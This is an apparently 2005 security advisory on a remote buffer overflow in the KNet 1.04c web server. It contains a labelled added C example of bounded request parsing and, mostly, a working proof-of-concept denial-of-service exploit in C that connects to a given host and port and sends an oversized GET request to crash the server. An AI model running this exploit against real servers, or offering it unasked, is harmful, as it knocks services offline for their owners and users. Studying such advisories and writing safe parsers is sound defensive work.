Buffer Overflow in Knet
Source: www.x0n3-h4ck.org  Author: ders  Published: 2005-03-08

Summary
KNet is "a small, functioning, web server that you can use to host a website from your very own hard drive".

A malicious attacker can send an arbitrarily long GET request that overwrites the EIP register, which can in turn be used to execute malicious code.

Credit:
The information has been provided by CorryL.

Details
Vulnerable Systems:
* Knet 1.04c
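
The server-side counterpart of the flaw described in the summary, as an added example that is not part of the original advisory and is not KNet's code: a request-line parser that measures the GET target before copying it and answers 414 when it exceeds a limit. The function name `parse_request_line`, the 255-byte `MAX_TARGET` limit and the sample requests are assumptions constructed for illustration.

```c
/* Added example: bounded parsing of an HTTP request line. KNet's source is
 * not on the page, so the names and the 255-byte limit are assumptions. */
#include <stdio.h>
#include <string.h>

#define MAX_TARGET 255   /* assumed maximum length of the request target */

/* Unsafe pattern behind this class of bug (kept as a comment only):
 *     char target[256];
 *     sscanf(line, "GET %s", target);   // no width: copies until whitespace
 */
/* Returns an HTTP status: 200 parsed, 400 malformed, 414 target too long,
 * 501 method other than GET. `out` must hold MAX_TARGET + 1 bytes. */
int parse_request_line(const char *line, size_t len, char *out)
{
    static const char method[] = "GET ";
    const size_t mlen = sizeof method - 1;
    size_t tlen = 0;
    const char *p;

    out[0] = '\0';
    if (len < mlen) return 400;
    if (memcmp(line, method, mlen) != 0) return 501;

    p = line + mlen;
    len -= mlen;
    /* Measure the target first; nothing is copied until its length is known. */
    while (tlen < len && p[tlen] != ' ' && p[tlen] != '\r' && p[tlen] != '\n')
        tlen++;
    if (tlen == 0) return 400;
    if (tlen > MAX_TARGET) return 414;   /* reject instead of truncating */

    memcpy(out, p, tlen);
    out[tlen] = '\0';
    return 200;
}

int main(void)
{
    char out[MAX_TARGET + 1];
    char big[1100];   /* constructed request shaped like the PoC's: 1023 x 'Z' */
    const char *ok = "GET /index.html HTTP/1.0\r\n";   /* constructed */
    memcpy(big, "GET ", 4);
    memset(big + 4, 'Z', 1023);
    memcpy(big + 1027, " \n\r\n\r", 5);
    printf("normal    -> %d\n", parse_request_line(ok, strlen(ok), out));
    printf("oversized -> %d\n", parse_request_line(big, 1032, out));
    return 0;
}
```

Rejecting with 414 rather than truncating keeps an oversized target from being served as a different, shorter path.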

Exploit:
/*
KNet <= 1.04c is affected by a remote buffer overflow in the GET command.
This PoC demonstrates the vulnerability.


KNet <= 1.04c PoC Denial Of Service Coded by: Expanders

Usage: ./x0n3-h4ck_Knet-DoS.c <Host> <Port>


*/

#include <stdio.h>
#include <stdlib.h>     /* malloc, free, atoi, exit */
#include <string.h>
#include <unistd.h>     /* close */
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define REQUEST_SIZE 12344

void help(char *program_name);


int main(int argc, char *argv[]) {

    struct sockaddr_in trg;
    struct hostent *he;
    int sockfd, rc;
    char evilbuf[1024];
    char *request;

    if(argc < 3 ) {
        help(argv[0]);
        exit(0);
    }
    printf("\n\n-=[ KNet <= 1.04c PoC DoS ::: Coded by Expanders ]=-\n");

    /* Resolve the host name; gethostbyname() returns NULL on failure. */
    he = gethostbyname(argv[1]);
    if(he == NULL) {
        printf("[Fail] -> Unable to resolve host\n\n");
        return 1;
    }
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    request = (char *) malloc(REQUEST_SIZE);
    if(sockfd < 0 || request == NULL) {
        printf("[Fail] -> Unable to allocate socket or buffer\n\n");
        return 1;
    }
    trg.sin_family = AF_INET;
    trg.sin_port = htons(atoi(argv[2]));
    trg.sin_addr = *((struct in_addr *) he->h_addr);
    memset(&(trg.sin_zero), '\0', 8);
    printf("\n\nConnecting to target \t...");
    rc=connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in));
    if(rc==0)
    {
        printf("[Done]\nBuilding evil buffer\t...");
        /* 1023 bytes of value 90 ('Z'), then an explicit terminator so the
           %s below stops at the end of the buffer. */
        memset(evilbuf,90,1023);
        evilbuf[1023] = '\0';
        printf("[Done]\nSending evil request \t...");
        snprintf(request,REQUEST_SIZE,"GET %s \n\r\n\r",evilbuf);
        send(sockfd,request,strlen(request),0);
        printf("[Done]\n\n[Finished] Check the server now\n");
    }
    else
        printf("[Fail] -> Unable to connect\n\n");
    close(sockfd);
    free(request);
    return 0;

}

void help(char *program_name) {

    printf("\n\t-=[ KNet <= 1.04b PoC Denial Of Service ]=-\n");
    printf("\t-=[ ]=-\n");
    printf("\t-=[ Coded by Expanders -/www.x0n3-h4ck.org\\- ]=-\n\n");
    printf("Usage: %s <Host> <Port>\n",program_name);
}



 